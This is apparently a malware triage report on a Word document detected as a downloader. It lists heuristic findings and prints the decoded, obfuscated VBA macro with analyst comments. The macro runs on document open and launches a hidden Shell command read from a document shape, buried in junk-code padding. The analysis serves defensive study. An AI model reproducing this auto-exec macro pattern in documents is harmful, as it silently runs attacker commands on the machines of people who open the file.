MALICIOUS
232
Risk Score
Heuristics 8
-
ClamAV: Doc.Downloader.Valyria-6769640-0 — critical — CLAMAV_DETECTION: ClamAV detected this file as malware (signature Doc.Downloader.Valyria-6769640-0).
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA — critical — OLE_VBA_SHELL: Shell() call in VBA. Matched line in script:
End If iBhKoI = Shell(mqlsPI + ZHjzL + QzQLs, oXvSNWdI) If (wEMNuff <> 0 Or vKHrGfLtQ) Then -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Document_Open macro — low — OLE_VBA_DOCOPEN: Document_Open macro. Matched line in script:
End Function Private Sub Document_open() If (auIRQQ <> 0 Or aOWazKfw) Then -
Reference to PowerShell high SC_STR_POWERSHELLReference to PowerShell
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL — info — EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL http://schemas.openxmlformats.org/drawingml/2006/main — in document text (OLE body); this is a standard OOXML/DrawingML namespace identifier that Office itself writes into documents, so on its own it is not evidence of network activity.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7694 bytes |
SHA-256: 7bf97758d6844cc4086324a2982b7b41f0fd337e7bb2d3f3a8ec5b33ff1be7fc
Detection
ClamAV: No threats found for the extracted macros.bas itself (the Doc.Downloader.Valyria-6769640-0 signature above matched the parent document, not this decoded source).
Obfuscation or payload:
likely
83 of 154 identifiers look randomly generated (e.g. 'IMuCUMWmGC'); 1 string-concatenation chain(s) — consistent with name-mangling obfuscation.
|
|||
Preview script — first 1,000 lines of the extracted script
' Module attributes recovered by olevba. VB_Base = "1Normal.ThisDocument" and
' VB_PredeclaredId = True mark this as the document's own class module, which is
' where the Document_open auto-exec handler below is hosted. The module name is
' itself one of the randomly generated identifiers the triage flagged.
Attribute VB_Name = "IMuCUMWmGC"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Analyst notes: the only effective statements in this function are the two
' marked "LIVE" below (read a command string out of a document shape, then run
' it with Shell). Everything else is dead padding. No Option Explicit is present
' and none of the names used in the If conditions are declared anywhere in the
' visible module, so they are Empty variants: (x <> 0 Or y) is False and each
' padded block never executes. Even if reached, the body statements only
' concatenate a comparison result onto an unused string (and some of the literal
' products would raise Overflow). This is name-mangling/junk-code obfuscation
' intended to dilute static matching; the real payload text is NOT in this file.
Function lwZCufGCP()
' Evaluates to 0; passed as Shell's windowstyle argument at the LIVE call below
' (0 = vbHide), so the spawned process runs with no visible window.
Const oXvSNWdI = 224789120 - 224789120
' Padding block (never executes; see note at top).
If (fHTtZ <> 0 Or vmRlIsaSH) Then
vmRlIsaSH = True
SSGLDOmUz = SSGLDOmUz & YGAKCB = 467282665 * 347386948
If (fHTtZ = 1) Then
SSGLDOmUz = SSGLDOmUz & FcNcin = Vlvwu - 325908429
SSGLDOmUz = SSGLDOmUz & JPiGC = GKwRU / wpYpmH
SSGLDOmUz = SSGLDOmUz & GzVptR = 126208497 / 45039723
Else
SSGLDOmUz = SSGLDOmUz & irqSSp = 235024981 - paJbtH
SSGLDOmUz = SSGLDOmUz & ujGLti = 137534374 - zqfwoN
SSGLDOmUz = SSGLDOmUz & KoZkoS = PUjwiY - 120808974
End If
End If
' Padding block (never executes).
If (GpYVq <> 0 Or vuAprmnw) Then
vuAprmnw = True
TdsQiTrs = TdsQiTrs & BiUshq = 284512062 - 29939391
If (GpYVq = 1) Then
TdsQiTrs = TdsQiTrs & SaUpZc = nkfok + 533672341
TdsQiTrs = TdsQiTrs & wJnPF = ujvQlO * lTHRDM
TdsQiTrs = TdsQiTrs & vZLTI = rPEjw + GcqsuE
Else
TdsQiTrs = TdsQiTrs & owNXKi = 283011076 / cqufTc
TdsQiTrs = TdsQiTrs & bUXwUG = BfbORH + VvbNM
TdsQiTrs = TdsQiTrs & YMiCA = 232234157 * hlBVZN
End If
End If
' LIVE: builds the command line from the text of a shape in the document body.
' The undeclared operands are Empty, so the index presumably resolves to
' Shapes(1) and the trailing "+ FoYcwZ + BTvOJMT" adds nothing. The command
' string therefore lives in the document's drawing layer, not in the macro
' source — static review of macros.bas alone will not show it; inspect the
' document's shapes/text frames (the SC_STR_POWERSHELL finding in the report
' suggests that is where the PowerShell reference was found — TODO confirm).
mqlsPI = Shapes(NszoLN + AnwhAKT + 1 + milkrFp + PaNOGfh).TextFrame.ContainingRange + FoYcwZ + BTvOJMT
' Padding block (never executes).
If (ciiWnKWj <> 0 Or nQlhTzZrN) Then
nQlhTzZrN = True
DJhLpGDVW = DJhLpGDVW & FOuLU = 529027297 / DwwSi
If (ciiWnKWj = 1) Then
DJhLpGDVW = DJhLpGDVW & wwmiz = AvpSw / 403899955
DJhLpGDVW = DJhLpGDVW & zcuSpQ = 462622714 + 416953551
DJhLpGDVW = DJhLpGDVW & oAPsZW = 274086552 / MQwdv
Else
DJhLpGDVW = DJhLpGDVW & MBMjZL = jVabn / 100433503
DJhLpGDVW = DJhLpGDVW & RMrIl = 520799977 / 4277701
DJhLpGDVW = DJhLpGDVW & fipBh = 109187285 * 524512413
End If
End If
' LIVE: executes the shape-derived string as a hidden child process of the
' Office host (windowstyle 0). ZHjzL and QzQLs are undeclared and add nothing;
' Shell's return value (the task id) is stored in iBhKoI but never used.
' Detection angle: WINWORD.EXE spawning a hidden command/PowerShell process
' shortly after document open.
iBhKoI = Shell(mqlsPI + ZHjzL + QzQLs, oXvSNWdI)
' Padding block (never executes).
If (wEMNuff <> 0 Or vKHrGfLtQ) Then
vKHrGfLtQ = True
ZEvzzCJ = ZEvzzCJ & wWuBMo = 136441263 + 333651452
If (wEMNuff = 1) Then
ZEvzzCJ = ZEvzzCJ & FAaNr = 282855970 - cuCaWH
ZEvzzCJ = ZEvzzCJ & EiGdtU = kawHJ * PjIEt
ZEvzzCJ = ZEvzzCJ & SnAikj = twJtZ + vZaNQR
Else
ZEvzzCJ = ZEvzzCJ & rPTiC = DnPtm / jXowDD
ZEvzzCJ = ZEvzzCJ & wUaca = 517687982 * YfOdpV
ZEvzzCJ = ZEvzzCJ & nlHDTV = 211598828 + 315062024
End If
End If
' Padding block (never executes).
If (zSZoF <> 0 Or FNVIK) Then
FNVIK = True
PMWzfdM = PMWzfdM & iclbP = 399999250 * 395708406
If (zSZoF = 1) Then
PMWzfdM = PMWzfdM & MAPbw = dXiWcs / 43176053
PMWzfdM = PMWzfdM & DCMlb = pGquzk - 162331629
PMWzfdM = PMWzfdM & jaaWhw = nzEzt * 154383572
Else
PMWzfdM = PMWzfdM & Sssiz = mcJBV - JmZLVG
PMWzfdM = PMWzfdM & qOMDw = 388283978 - piTMF
PMWzfdM = PMWzfdM & OsQWwN = uawGW * 325567165
End If
End If
' Padding block (never executes).
If (jXMzc <> 0 Or wfCwGpw) Then
wfCwGpw = True
KtTPDD = KtTPDD & wtQdz = 271725045 / 83614485
If (jXMzc = 1) Then
KtTPDD = KtTPDD & MrsIp = 306560923 / rfSSUk
KtTPDD = KtTPDD & zipTPG = 471489280 - 386022285
KtTPDD = KtTPDD & ujhiq = Uzhdw / 150380567
Else
KtTPDD = KtTPDD & fSmoJ = 326048488 + 314223035
KtTPDD = KtTPDD & RLFmsb = fZEYIZ + WhPcK
KtTPDD = KtTPDD & RWJtw = 379478191 * 519240723
End If
End If
' Padding block (never executes).
If (cliDXv <> 0 Or DGcWKvUoQ) Then
DGcWKvUoQ = True
twdnpJZX = twdnpJZX & KvQlch = EUiwZD + 325012030
If (cliDXv = 1) Then
twdnpJZX = twdnpJZX & jbIASL = 243762865 + 97847169
twdnpJZX = twdnpJZX & TzqQaX = dnbFfc * znUApj
twdnpJZX = twdnpJZX & zFUNqN = LhIGLw - zaVCJc
Else
twdnpJZX = twdnpJZX & hHqtaA = onAdbF - 218359720
twdnpJZX = twdnpJZX & sVDkK = 480985890 * 271183468
twdnpJZX = twdnpJZX & RGSwU = 450873287 - tzMzwf
End If
End If
' No explicit return value is ever assigned; the function is used purely for
' its side effect (the Shell call).
End Function
' Auto-execution entry point: Word raises Document_Open when the document is
' opened with macros enabled (reported as OLE_VBA_DOCOPEN). The only effective
' statement is the bare call to lwZCufGCP roughly midway through; every If
' block is the same dead padding as in lwZCufGCP (undeclared Empty variants
' make each condition False), placed around the call to bury it.
Private Sub Document_open()
' Padding block (never executes; see note at top).
If (auIRQQ <> 0 Or aOWazKfw) Then
aOWazKfw = True
cEUajiz = cEUajiz & qnAEMF = 327800203 * ocbWLV
If (auIRQQ = 1) Then
cEUajiz = cEUajiz & AjWpMa = GULAJY * jGhwu
cEUajiz = cEUajiz & acPdN = llXjJ + 519343112
cEUajiz = cEUajiz & ApDoEu = 515032081 - 312413582
Else
cEUajiz = cEUajiz & YtkTp = CjdFV * 296778186
cEUajiz = cEUajiz & ZRAMXQ = bDoIik + QIjEu
cEUajiz = cEUajiz & mfVcq = 366197253 / 218370920
End If
End If
' Padding block (never executes).
If (wfFNYlSk <> 0 Or HzijLFBww) Then
HzijLFBww = True
UTjAOwL = UTjAOwL & KBZnd = 319061158 + XIdwv
If (wfFNYlSk = 1) Then
UTjAOwL = UTjAOwL & BDohv = 200065476 - 491863933
UTjAOwL = UTjAOwL & oPiTz = hhVNQf / RNjHjS
UTjAOwL = UTjAOwL & TTJDc = 456738904 / 535880450
Else
UTjAOwL = UTjAOwL & BjVRf = EzIwTr - sGwtJ
UTjAOwL = UTjAOwL & zGiERw = 396145209 + 182634095
UTjAOwL = UTjAOwL & PazUF = 473031451 + qzjALE
End If
End If
' Padding block (never executes).
If (zdTPNO <> 0 Or tIcksYF) Then
tIcksYF = True
SSzbI = SSzbI & osZvGj = oCwUoA - rjUznu
If (zdTPNO = 1) Then
SSzbI = SSzbI & KVjlU = HjfjjI + IltTGi
SSzbI = SSzbI & EFiPEX = MizBn - 267123905
SSzbI = SSzbI & NiWpK = 45991252 / pTHWRo
Else
SSzbI = SSzbI & ImGqAq = zIEqU / 309682322
SSzbI = SSzbI & wjvwii = 125639746 - 364226225
SSzbI = SSzbI & uidODJ = 434525500 / 4375307
End If
End If
' Padding block (never executes).
If (bwjNbYPY <> 0 Or szKiO) Then
szKiO = True
ajVco = ajVco & YJomv = 410176811 + 224657245
If (bwjNbYPY = 1) Then
ajVco = ajVco & iIrmqW = YMUdt * 475746604
ajVco = ajVco & hKoGk = 457674572 - 463280713
ajVco = ajVco & NjZDi = 396580154 + 56394190
Else
ajVco = ajVco & hfhCnv = 443827369 - fmlQOF
ajVco = ajVco & oJqsG = cTHvk + DShEE
ajVco = ajVco & IEJqn = YZCOW * uZBifE
End If
End If
' LIVE: the whole point of this handler — invokes the function that reads the
' command from a document shape and launches it hidden via Shell.
lwZCufGCP
' Padding block (never executes).
If (LcIjCpj <> 0 Or AcfYLT) Then
AcfYLT = True
jkBinn = jkBinn & wZKSHu = 80734416 + 355806204
If (LcIjCpj = 1) Then
jkBinn = jkBinn & XWOpTQ = jcjvSz + HYWrT
jkBinn = jkBinn & lsobn = QfjWjh / 15906184
jkBinn = jkBinn & XcGRjr = 159107910 * nDIVm
Else
jkBinn = jkBinn & pmpAo = odJfhn * 113519003
jkBinn = jkBinn & jzvzG = 529810725 + NcZiAH
jkBinn = jkBinn & zPdijS = Szipih + sLOzY
End If
End If
' Padding block (never executes).
If (LDsGCYYs <> 0 Or HptBbZ) Then
HptBbZ = True
bvOwj = bvOwj & VFOYoV = LhbdF * LkchuP
If (LDsGCYYs = 1) Then
bvOwj = bvOwj & hWApjj = KnBJi + 303723400
bvOwj = bvOwj & cinrdj = 182673655 / aEaNP
bvOwj = bvOwj & nNQwNU = JBwEZs / BGYjS
Else
bvOwj = bvOwj & HLdzlE = Lzcwn + jtGuo
bvOwj = bvOwj & ovoaji = lbCTj * vQobkT
bvOwj = bvOwj & JKYJZ = RAIOv - 270124549
End If
End If
End Sub
|
|||